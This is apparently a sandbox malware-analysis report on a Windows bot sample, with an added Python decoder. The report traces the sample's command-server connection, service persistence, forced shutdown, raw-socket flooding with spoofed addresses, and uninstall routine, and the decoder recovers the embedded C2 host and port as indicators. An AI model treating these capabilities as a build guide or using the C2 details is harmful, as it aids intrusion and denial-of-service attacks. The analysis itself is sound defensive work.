      • Instruction ID: 48e4d2b60afa01354a8a6fe0455daa5a0df1e06f04bad4fcbe58ea4c3ca8c96e
      • Opcode Fuzzy Hash: 64929941959a351eb6e5df3572f0dec3118bb976535e345188da3b5fc1adc2ac
      • Instruction Fuzzy Hash: 5D1166B1690354BBDB10DF50CCD9F693369BB09704F158039BB0ABE2D1E7B86914862D

      Control-flow Graph

      Control-flow graph (rendered image not preserved). Basic blocks recovered from the graph data for the function at 40d016-40d0bd: 40d016-40d01c entry; 40d01f-40d031 LoadLibraryA; 40d034-40d038 and 40d058-40d05e loop around 40d03a-40d03d / 40d03f-40d056 GetProcAddress (import resolution, one library per outer iteration); 40d060-40d061 call 406826 / call 40682d (the lstrcat, CreateFileA, SetFilePointer, WriteFile routine whose APIs are listed above at 00406851-004068D4); 40d07e-40d097 DeleteFileA; 40d099-40d0af GetPEB; 40d0b1-40d0b8; 40d0bc-40d0bd call 40d0c2.
      APIs
      • LoadLibraryA.KERNEL32(00400000,00400000), ref: 0040D028
      • GetProcAddress.KERNEL32(00000000), ref: 0040D047
      Memory Dump Source
      • Source File: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID:
      • API String ID: 2574300362-0
      • Opcode ID: 14e5a918ddaf0084f4d854524b0471831e9950063073d57c4f2344471fdd9e3b
      • Instruction ID: 6c3bf372d224c83a881a8ca97f7b757c9271284dc59a6cb52084675be33e3eb9
      • Opcode Fuzzy Hash: 14e5a918ddaf0084f4d854524b0471831e9950063073d57c4f2344471fdd9e3b
      • Instruction Fuzzy Hash: 42E065B18401289BD3245B40ED44762371CDB02328F194079EC097F682D77E6C07861C

      Non-executed Functions

      Control-flow Graph

      Control-flow graph (rendered image not preserved). Basic blocks recovered from the graph data for the function at 4023a0-402c7d:
      • 4023a0-4023b2 entry; 4023b8-40241a lstrlen, call 404a50, call 402c80 (the wvsprintfA/OutputDebugStringA logger shown as a subcall below), strstr.
      • 402420-4024a0; 4024a2-4024da call 401440, _strlwr, lstrcpy, strstr; 4024dc and 4024e2-402515 Sleep, call 401440, _strlwr, lstrcpy, strstr (retry path); 402517-40252c strstr; 40252e-40253d; 402541-40254e strstr; 402550-402594 strcspn, strncpy, strcspn, strstr; 402596-4025c0 strcspn, strncpy, atoi.
      • 4025c5-402625 socket, call 4030e0, htons, connect; branches to 402c71-402c7d (function exit) or to 40262b-402650 call 4049d0.
      • 402656-40269e call 402fd0, call 402cb0 (the host-profile routine listed below at 00402D06-00402FA0), call 404780, send; branches to 402c6a-402c6b closesocket or to 4026a4-4026a7.
      • 4026b3-4026f1 select; 4026fb-40270b __WSAFDIsSet; 40270d-40272c recv; 402c54-402c64 InterlockedExchange, shutdown.
      • 402744-402759 InterlockedExchange, then the dispatch chain 40275f-4029cc: each decision block is followed by a CreateThread loop (thread procedures 403110, 403440, 403a30, 4035d0, 403710, 403850, 403ba0, 403cc0, 403d70, 403e20, 404340, 404090, 404490); 4029ce-402a03 recv; 402a05-402a33 CreateThread (thread procedure 4046c0).
      • 402a3b-402a8e send; 402a93-402ae4 shutdown, closesocket; 402ae9-402b01 and 402b12-402b2a call 401390 (the OpenProcessToken/LookupPrivilegeValueA routine listed below) then ExitWindowsEx; 402b59-402b66 call 401640 (the DeviceIoControl routine listed below); 402b78-402b85 call 401510.
      • 402b9c-402bb1 OpenMutexA; 402bb3-402bbb ReleaseMutex, CloseHandle; 402bc1-402c4e GetSystemDirectoryA, lstrcat x2, DeleteFileA, call 4022c0 (the DeleteService routine listed below), wsprintfA, SHDeleteKeyA, closesocket, ExitProcess (uninstall path).
      APIs
      • lstrlen.KERNEL32(O5WGU2RYGMXDGMZSGIXG64THHI4DG===), ref: 004023CD
        • Part of subcall function 00402C80: wvsprintfA.USER32(?,?,?), ref: 00402C98
        • Part of subcall function 00402C80: OutputDebugStringA.KERNEL32(00000000,?,?,?), ref: 00402CA3
      • strstr.MSVCRT ref: 00402413
      • _strlwr.MSVCRT ref: 004024B6
      • lstrcpy.KERNEL32(?,00000000), ref: 004024C7
      • strstr.MSVCRT ref: 004024D3
      • Sleep.KERNEL32(00002710), ref: 004024E7
      • _strlwr.MSVCRT ref: 004024F7
      • lstrcpy.KERNEL32(?,00000000), ref: 00402502
      • strstr.MSVCRT ref: 0040250E
      • strstr.MSVCRT ref: 00402525
      • strstr.MSVCRT ref: 00402547
      • strcspn.MSVCRT ref: 0040256A
      • strncpy.MSVCRT ref: 00402579
      • strcspn.MSVCRT ref: 00402581
      • strstr.MSVCRT ref: 0040258D
      • strcspn.MSVCRT ref: 004025A7
      • strncpy.MSVCRT ref: 004025B0
      • atoi.MSVCRT(?), ref: 004025B7
      • socket.WS2_32(00000002,00000001,00000006), ref: 004025CB
      • htons.WS2_32(00000000), ref: 00402609
      • connect.WS2_32(00000000,?,00000010), ref: 0040261C
      • send.WS2_32(00000000,?,000000E8,00000000), ref: 00402696
      • select.WS2_32(?,?,00000000,00000000,?), ref: 004026E8
      • __WSAFDIsSet.WS2_32(?,?), ref: 00402704
      • recv.WS2_32(?,00409A80,0000007C,00000000), ref: 00402724
      • InterlockedExchange.KERNEL32(00409A7C,00000000), ref: 0040274A
      • CreateThread.KERNEL32(00000000,00000000,00403110,00000000,00000000,00000000), ref: 00402774
      • CreateThread.KERNEL32(00000000,00000000,00403110,00000000,00000000,00000000), ref: 0040279B
      • CreateThread.KERNEL32(00000000,00000000,00403110,00000000,00000000,00000000), ref: 004027BC
      • CreateThread.KERNEL32(00000000,00000000,00403440,00000000,00000000,00000000), ref: 004027DE
      • CreateThread.KERNEL32(00000000,00000000,00403440,00000000,00000000,00000000), ref: 00402805
      • CreateThread.KERNEL32(00000000,00000000,00403A30,00000000,00000000,00000000), ref: 0040282C
      • CreateThread.KERNEL32(00000000,00000000,004035D0,00000000,00000000,00000000), ref: 00402853
      • CreateThread.KERNEL32(00000000,00000000,00403710,00000000,00000000,00000000), ref: 0040287A
      • CreateThread.KERNEL32(00000000,00000000,00403850,00000000,00000000,00000000), ref: 004028A1
      • CreateThread.KERNEL32(00000000,00000000,00403BA0,00000000,00000000,00000000), ref: 004028C8
      • CreateThread.KERNEL32(00000000,00000000,00403CC0,00000000,00000000,00000000), ref: 004028DE
      • CreateThread.KERNEL32(00000000,00000000,00403CC0,00000000,00000000,00000000), ref: 004028FA
      • CreateThread.KERNEL32(00000000,00000000,00403D70,00000000,00000000,00000000), ref: 00402906
      • CreateThread.KERNEL32(00000000,00000000,00403CC0,00000000,00000000,00000000), ref: 00402928
      • CreateThread.KERNEL32(00000000,00000000,00403E20,00000000,00000000,00000000), ref: 0040294F
      • CreateThread.KERNEL32(00000000,00000000,00404340,00000000,00000000,00000000), ref: 00402976
      • CreateThread.KERNEL32(00000000,00000000,00404090,00000000,00000000,00000000), ref: 0040299D
      • CreateThread.KERNEL32(00000000,00000000,00404490,00000000,00000000,00000000), ref: 004029BE
      • recv.WS2_32(?,00408A7C,?,00000000), ref: 004029F4
      • CreateThread.KERNEL32(00000000,00000000,004046C0,00000000,00000000,00000000), ref: 00402A29
      • send.WS2_32(?,?,00000004,00000000), ref: 00402A88
      • shutdown.WS2_32(?,00000002), ref: 00402AD3
      • closesocket.WS2_32(?), ref: 00402ADE
      • ExitWindowsEx.USER32(00000002,00000000), ref: 00402AFB
      • ExitWindowsEx.USER32(00000001,00000000), ref: 00402B24
      • InterlockedExchange.KERNEL32(00409A7C,00000001), ref: 00402B91
      • OpenMutexA.KERNEL32(001F0001,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===), ref: 00402BA7
      • ReleaseMutex.KERNEL32(00000000), ref: 00402BB4
      • CloseHandle.KERNEL32(00000000), ref: 00402BBB
      • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 00402BCB
      • lstrcat.KERNEL32(?,0040862C), ref: 00402BE1
      • lstrcat.KERNEL32(?,WinH83.exe), ref: 00402BED
      • DeleteFileA.KERNEL32(?), ref: 00402BF4
      • wsprintfA.USER32 ref: 00402C26
      • SHDeleteKeyA.SHLWAPI(80000002,?,?,00000000,00000000,?), ref: 00402C3C
      • closesocket.WS2_32(?), ref: 00402C47
      • ExitProcess.KERNEL32 ref: 00402C4E
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: CreateThread$strstr$Exitstrcspn$DeleteExchangeInterlockedMutexWindows_strlwrclosesocketlstrcatlstrcpyrecvsendstrncpy$CloseDebugDirectoryFileHandleOpenOutputProcessReleaseSleepStringSystematoiconnecthtonslstrlenselectshutdownsocketwsprintfwvsprintf
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===$SYSTEM\CurrentControlSet\Services\%s$SeShutdownPrivilege$WinH83$WinH83.exe$http
      • API String ID: 2249562296-380182697
      • Opcode ID: 51b1d1f3a17f7fde80cfcb2049c1321e642544511561daa928ada41410eabac3
      • Instruction ID: 052ee0806c164ae71cab3f55b8a9cb77ea0192696f3459dbd542b9296f22baf5
      • Opcode Fuzzy Hash: 51b1d1f3a17f7fde80cfcb2049c1321e642544511561daa928ada41410eabac3
      • Instruction Fuzzy Hash: 8332C4B13002146BD7249B249FC9FAB729CEB84744F10493EFA46B32D1DAB8DD458B6D
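      The function above measures the hard-coded literal O5WGU2RYGMXDGMZSGIXG64THHI4DG=== (lstrlen at 004023CD), splits the result with strcspn/strncpy, converts the tail with atoi (004025B7) and feeds it to htons/connect, and later reuses the same literal as the mutex name for OpenMutexA (00402BA7). The literal is valid RFC 4648 Base32 and decodes to a host:port pair (wljj83.3322.org, port 83), so this is the C2 address being decoded at run time. The following added example (not code from the report or from the sample) performs that decode and mirrors the strcspn/atoi split, including atoi's quirk of returning 0 for a missing port; the function names, the default port for the no-separator case, and the pairing of the "WinH83" string with the "SYSTEM\CurrentControlSet\Services\%s" format are assumptions made for illustration.

```python
import base64
import re

# Constructed from the report: the literal passed to lstrlen (004023CD) and
# OpenMutexA (00402BA7), the dropped file name, and the "WinH83" string that
# this function formats into "SYSTEM\CurrentControlSet\Services\%s" before
# SHDeleteKeyA (pairing those two strings is an inference from the string list).
CONFIG_B32 = "O5WGU2RYGMXDGMZSGIXG64THHI4DG==="
DROP_NAME = "WinH83.exe"
SERVICE_NAME = "WinH83"


def decode_config(b32: str) -> str:
    """Base32-decode (RFC 4648 alphabet) the hard-coded literal.

    b32decode is strict about padding: three '=' mean the last quantum
    carries three bytes, which is exactly what this string has.
    """
    return base64.b32decode(b32).decode("ascii")


def c_atoi(s: str) -> int:
    """atoi semantics as used at 004025B7: optional sign and leading digits,
    stop at the first non-digit, 0 when there are no digits at all."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0


def split_host_port(s: str, default_port: int = 80) -> tuple[str, int]:
    """Mirror the strcspn/strncpy/atoi chain at 0040256A-004025B7.

    strcspn(s, ":") is the host length; the bytes after ':' go through
    atoi, so 'host:' yields port 0 rather than an error. default_port is
    an assumption for the no-separator case; the report shows no such path.
    """
    i = s.find(":")
    if i < 0:
        return s, default_port
    return s[:i], c_atoi(s[i + 1:])


def host_indicators(b32: str = CONFIG_B32) -> dict:
    """The artefacts a responder can pivot on from this single function."""
    host, port = split_host_port(decode_config(b32))
    return {
        "c2_host": host,
        "c2_port": port,
        "mutex": b32,  # the raw, still-encoded literal is the mutex name
        "dropped_file": "%SystemRoot%\\System32\\" + DROP_NAME,  # GetSystemDirectoryA + lstrcat
        "service_key": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\" + SERVICE_NAME,
    }


if __name__ == "__main__":
    for k, v in host_indicators().items():
        print(f"{k:13} {v}")
```

      Because the raw Base32 text is also the mutex name, a single string search for the literal finds both the configuration and the single-instance check, and the decoded host is what belongs in network blocklists.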

      Control-flow Graph

      Control-flow graph (rendered image not preserved). Basic blocks recovered from the graph data for the function at 402cb0-402fc9: 402cb0-402d0e RegOpenKeyExA; 402d14-402d70 RegQueryValueExA, RegCloseKey; 402d72 and 402d78-402d8e _strnicmp, looping through 402d90-402d93; 402d95-402db4; 402db6-402dd1; 402dd3-402dfa GetVersionExA; 402dfc-402e08 and the decision chain 402e09-402ec5 selecting among the "Win 95" through "Win Vista" strings; 402ec7-402fc9 wsprintfA, GlobalMemoryStatusEx, call 4056b0, _ui64toa, GetSystemDefaultUILanguage.
      APIs
      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,00000000), ref: 00402D06
      • RegQueryValueExA.ADVAPI32 ref: 00402D48
      • RegCloseKey.ADVAPI32(?), ref: 00402D53
      • _strnicmp.MSVCRT ref: 00402D87
      • GetVersionExA.KERNEL32(?), ref: 00402DF2
      • wsprintfA.USER32 ref: 00402EE6
      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00402EFC
      • _ui64toa.MSVCRT ref: 00402F2A
      • GetSystemDefaultUILanguage.KERNEL32 ref: 00402FA0
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValueVersion_strnicmp_ui64toawsprintf
      • String ID: %s SP%d$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$O5WGU2RYGMXDGMZSGIXG64THHI4DG===$ProcessorNameString$Win 2000$Win 2003$Win 95$Win 98$Win NT$Win Vista$Win XP
      • API String ID: 3322224748-824182824
      • Opcode ID: f6c0c16aefc7028bb481e130bd88835b7dfbc170d6bdc2f10909af5a7c339e0c
      • Instruction ID: 13d3b61b23b45e2e4c023b9cc0fc35249b46de21b34556b10f0f5e52fe902c2b
      • Opcode Fuzzy Hash: f6c0c16aefc7028bb481e130bd88835b7dfbc170d6bdc2f10909af5a7c339e0c
      • Instruction Fuzzy Hash: 108127316047044BD728CA24C904BABB3D6FBC4320F514A3EF95AE73D0DFB99D09868A
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004021AB
      • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004021DA
      • GetLastError.KERNEL32 ref: 004021E9
      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004021FD
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00402211
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0040221C
      • wsprintfA.USER32 ref: 00402233
      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 0040224C
      • lstrlen.KERNEL32(?), ref: 00402256
      • RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,?,00000000), ref: 0040226B
      Strings
      • Description, xrefs: 00402262
      • SYSTEM\CurrentControlSet\Services\%s, xrefs: 00402227
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Service$Open$Start$CreateErrorLastManagerValuelstrlenwsprintf
      • String ID: Description$SYSTEM\CurrentControlSet\Services\%s
      • API String ID: 1085164444-2908613140
      • Opcode ID: 154c3cc990fdae9aed9d98df527cbfc1d14e78514fef328f6b991c8467dc1853
      • Instruction ID: f4580113edc8e433eb06b14144884acc633483daa5052ba9940653bc4dc6f673
      • Opcode Fuzzy Hash: 154c3cc990fdae9aed9d98df527cbfc1d14e78514fef328f6b991c8467dc1853
      • Instruction Fuzzy Hash: 9C319971981224BBD720DF949E49F9F7B7CEB48B51F100169FA15B62C1C7B45910CBA8
      APIs
      • GetCurrentProcess.KERNEL32(00000028), ref: 004013A2
      • OpenProcessToken.ADVAPI32(00000000), ref: 004013A9
      • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004013C3
      • CloseHandle.KERNEL32(00000000), ref: 004013D2
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Process$CloseCurrentHandleLookupOpenPrivilegeTokenValue
      • String ID:
      • API String ID: 2654680240-0
      • Opcode ID: 8864c288b9cb71c30d5e91295d1a8abcd9c991bda94a8974c1128a605e635a0a
      • Instruction ID: cc2b99641f5a8469a3b4e8ed31b91ddc2a866a93870fc30e959dc988af51fc73
      • Opcode Fuzzy Hash: 8864c288b9cb71c30d5e91295d1a8abcd9c991bda94a8974c1128a605e635a0a
      • Instruction Fuzzy Hash: 61115EB4644301ABE700DF64CD49B6B77E8FF88700F80892CF989E6290E378D9048B67
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004022CA
      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004022E3
      • DeleteService.ADVAPI32(00000000), ref: 004022F6
      • CloseServiceHandle.ADVAPI32(00000000), ref: 004022FD
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00402300
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Service$CloseHandleOpen$DeleteManager
      • String ID:
      • API String ID: 204194956-0
      • Opcode ID: 116d1e0ec0a4b372d694c8a67d0e82791e6de5e32c851d8c30bee83f41f85077
      • Instruction ID: 9b0c48f28204a619d0ffdb4144fcbd549302fdad28ef3037a9a57e52c33c53b6
      • Opcode Fuzzy Hash: 116d1e0ec0a4b372d694c8a67d0e82791e6de5e32c851d8c30bee83f41f85077
      • Instruction Fuzzy Hash: 91E0D8362826227BE2129328AD88F7F762CEF85B91F010125FB0576288CE748C019679
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000040), ref: 0040103F
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystem
      • String ID: \svchost.exe
      • API String ID: 2188284642-2416354339
      • Opcode ID: 20f70d25f9676ffdcdf1ef635abbee3c6989bc9dfcb48b6a723411113e9e4b98
      • Instruction ID: 7b973d18f3f385e2b8da6ee8bdeae4eb795e5e4e7678e48289140b949f781a9d
      • Opcode Fuzzy Hash: 20f70d25f9676ffdcdf1ef635abbee3c6989bc9dfcb48b6a723411113e9e4b98
      • Instruction Fuzzy Hash: BB1106756016488FC718CF29D584E56BBE4FB04364F0142BEE91ADB7E2DA74D908C758
      APIs
      • DeviceIoControl.KERNEL32(?,0022E14B,?,00000004,?,00000004,?,00000000), ref: 004016A3
      • GetLastError.KERNEL32 ref: 004016AD
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: ControlDeviceErrorLast
      • String ID:
      • API String ID: 2645620995-0
      • Opcode ID: fe5585f4748b38fa9a506305bcd843cf95f0b09592f7f9aa14bd26abe84b249e
      • Instruction ID: 8bdfebe32dfe5ddeb58f347a55ad02e0e9a9a1e444e6547fa025e88e6347be7c
      • Opcode Fuzzy Hash: fe5585f4748b38fa9a506305bcd843cf95f0b09592f7f9aa14bd26abe84b249e
      • Instruction Fuzzy Hash: AAE04F703403027FEA10CFA0CC85F1733D8AB80B48F08893CB209E92D0E7B8D844C629
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2ffa0374c3452c7b45537c3aac30dca2655e988646b1adc00c7e20327800d53c
      • Instruction ID: f8b4bcb92d8f4c944223f3c11e07fdf06c0dc5259006c63bd6e70ab53eee926f
      • Opcode Fuzzy Hash: 2ffa0374c3452c7b45537c3aac30dca2655e988646b1adc00c7e20327800d53c
      • Instruction Fuzzy Hash: CD91D86184E3C06FD71387708C659917FB4AE13214B1A81EBE4C0EF4E3D26C694AD72B
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: bc3bc76f23b8451945670fb8ba92aaa9b44c7c866afdecc5507a8941fd66445c
      • Instruction ID: fbe82208a77236332a1fdc5c7113bf994c8e3d1fb805a4b59f5b8a24247e462b
      • Opcode Fuzzy Hash: bc3bc76f23b8451945670fb8ba92aaa9b44c7c866afdecc5507a8941fd66445c
      • Instruction Fuzzy Hash: 46415470A082059FDB14DF69C490A6AB7B1BF84328B14C57EE86AAB3D5CB74F940CB45

      Control-flow Graph

      APIs
      • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 00403145
      • setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 0040317A
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Socketsetsockopt
      • String ID: %u.193.%d.%d$@$E$P
      • API String ID: 4073417641-4005098346
      • Opcode ID: 2106d30019bef2af147a48b56c11f1fe6b56fd7c12d80706179d367cc767660b
      • Instruction ID: 4f5575538a0cf794be7eb95a31b6b2e6ffef1db0ee0ea924ed66e0d3a4dc536f
      • Opcode Fuzzy Hash: 2106d30019bef2af147a48b56c11f1fe6b56fd7c12d80706179d367cc767660b
      • Instruction Fuzzy Hash: 7C81CE711083449AD710DF64DC41BABBBE5AFC8710F00492EF695A72D1DAB49A08CBAB

      Control-flow Graph

      APIs
      • GetModuleHandleA.KERNEL32(ntdll.dll,NtQuerySystemInformation), ref: 0040187B
      • GetProcAddress.KERNEL32(00000000), ref: 00401882
      • GlobalAlloc.KERNEL32(00000040,?), ref: 004018AC
      • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 004018E2
      • GetLastError.KERNEL32 ref: 004018F2
      • printf.MSVCRT ref: 004018FE
      • GlobalFree.KERNEL32(?), ref: 00401914
      • GetProcAddress.KERNEL32(00000000,KeServiceDescriptorTable), ref: 00401920
